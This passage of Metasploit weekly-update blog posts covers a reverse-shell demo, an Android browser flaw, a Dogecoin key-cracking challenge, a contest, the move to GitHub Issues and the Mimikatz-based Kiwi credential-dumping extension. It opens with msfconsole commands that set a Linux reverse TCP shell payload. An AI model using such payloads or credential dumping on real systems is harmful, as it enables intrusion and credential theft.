msf> set payload linux/x86/shell_reverse_tcp

msf> set LHOST

msf> run


Right now, X86 and X86_64 targets (of any platform) are supported, but it would be very easy to extend to other architectures. Feel free to do so!


Hack my Dogecoin (Such Doxing. Wow.)

This week, my DEF CON interview with Alicia Mae Webb went up on SecureNinjaTV. Feel free to watch the whole thing, in which I talk about how great the Metasploit open source community is and then demo the infamous addJavascriptInterface vulnerability on a very popular browser available today on the Google Play store. I'm really kind of annoyed that this bug is so long-lived. While it's apparently been blocked in the very latest Android 4.4.4 (according to Android Tamer), it's basically a backdoor for any sub-4.4.4 Android version out there today -- that's at least 75% of all Android devices (anyone running less than 4.4). Android 4.4.4 was posted in mid-June of 2014, but of course, not all carriers have picked it up yet, and not all eligible users have updated. Be sure to check if you can pick it up by using your phone's usual over-the-air (OTA) update process.



Alternatively, don't pay any attention to that bit at all, and just skip ahead to about the 9:40 mark and watch as I disclose my own Dogecoin wallet private key. Yes, it's encrypted, but a careful transcriber of the shown characters should be able to crack the password pretty quickly, given the right bruteforcing techniques. So, take this as a challenge: if you can crack my private key, feel free to take the Dogecoin as a reward, and even better, let me (and the rest of the world) know how you did it. I'm curious what approach you take. Which reminds me, I need to update Metasploit's Bitcoin Jacker to be more cryptocurrency (and host OS) agnostic.


New Modules

Including the modules discussed above, we have nine new modules this week. In fact, this week, we surpassed 1337 exploits! That's fun.


Exploit modules

Auxiliary and post modules


If you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows. If you're already tracking the bleeding-edge of Metasploit development, then these modules are but an msfupdate command away. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new hotness today when you check for updates through the Software Updates menu under Administration.


For additional details on what's changed and what's current, please see Chris Doughty's most excellent release notes.


Weekly Metasploit Update

Posted by todb Employee Sep 5, 2014

Loginpalooza, the Great Credential Refactor

In August, we ran a little contest here in the People's Republic of Metasploit to see about converting a pile of credential-gathering modules to the new after the release of Metasploit 4.10. Today, I'm happy to announce the winners:


First place goes to Tom Sellers, for his work on a number of modules and constant feedback and question-asking on how the heck to do all this stuff. In return, we'll be sending him a delightful Wifi Pineapple Ultra Bundle -- try not to get it pwned by @ihuntpineapples!


Second and Other Second place goes to Chris Truncer and 0a2940, for their work on the IP board and AppleTV modules. Since they both ended up at pretty much the same place with their work, and were super useful in teasing out documentation and functionality issues with the new credential module authoring process, we'll be sending both of them a second place prize of an OnionPi (just as soon as they're back in stock).


These open source contributors really dove in and helped us out a lot by actually working with the new LoginScanner mixin and the Credential Gem. We still have work to do to get these components more developer friendly, so keep an eye on that work as we make progress for total conversion.


Retiring Redmine

A couple weeks ago, I kicked off an informal Twitter poll:



Well, the response was overwhelmingly in favor of GitHub Issues as a replacement. I do love Redmine, don't get me wrong -- it's pretty amazing project planning and issue tracking software, and it's open source, and it's written in Ruby, so what's not to love?


As it turns out, we kind of live and breathe on GitHub these days, we use Pull Requests pretty extensively, and GitHub Issues recently saw a pretty amazing update that makes labelling, searching, and sorting on issues a delightful experience. You can read all about that, here. GitHub Issues just offers us much better integration with the way we do things already, so I'm pretty thrilled about the move.


So, over the next few weeks, we'll be retiring our beloved Redmine server at We've gone through and triaged some dozens of Redmine bugs to move over to GitHub (and you can see which ones using this search for Framework and this one for Meterpreter), and will be making the call on the rest soon.


If you have a favorite issue or feature request that you can't live without on GitHub, and it's not yet on that list, please feel free to re-create the issue on GitHub. As it stands, we're assuming bugs that are over a year old (pre-4.8.0) probably aren't show-stoppers or have already been fixed in the last couple releases. We'll have time to make sure this is the case, and don't worry, we won't be deleting any of Redmine's historical data.


That all said, the moral of the story here is that the switch over to end-to-end GitHub should make the whole issue/bug/fix workflow a lot smoother and more reliable for both our internal and external developers, and I'm excited to be injecting a little more efficiency in the whole Metasploit donut-making process.


Note that Metasploit Community, Express, and Pro users should still stick to their support contacts here at Rapid7 and SecurityStreet (especially for "how do I..." sorts of questions). Those resources aren't going away anytime soon.


Meterpreter Kiwi Extension

Last but in absolutely no way least, Metasploit now boasts the mighty Kiwi Extension! Kiwi is the Meterpreter and Metasploit integration of all the available Mimikatz techniques for dumping credentials from memory on fully-pached Windows machines. Thanks to the heroic efforts of OJ TheColonial Reeves, Benjamin gentilkiwi Delpy, and the nattering and gnashing of teeth from Rob mubix Fuller and Josh kernelsmith Smith. Thanks guys!


New Modules

Since the last release, we've only two new modules this week. While it may seem a little light, the last release, 2014082701, was actually staged up on Friday afternoon (and not the usual Monday cut). This was to ensure we were able to address the outstanding issues involving a database-less use of msfconsole and msfcli. The downside is, sadly, only allowing for one weekend for new modules this week -- over a US holiday, no less. But, you should update anyway! The Rsync auxiliary module is pretty fun to use, and brings some security attention to an often-used, but often-misunderstood, backup infrastructure technique.


Exploit modules

Auxiliary and post modules


For additional details on what's changed and what's current, please see Chris Doughty's most excellent release notes. Thanks Chris!

Filter Blog

By date: By tag: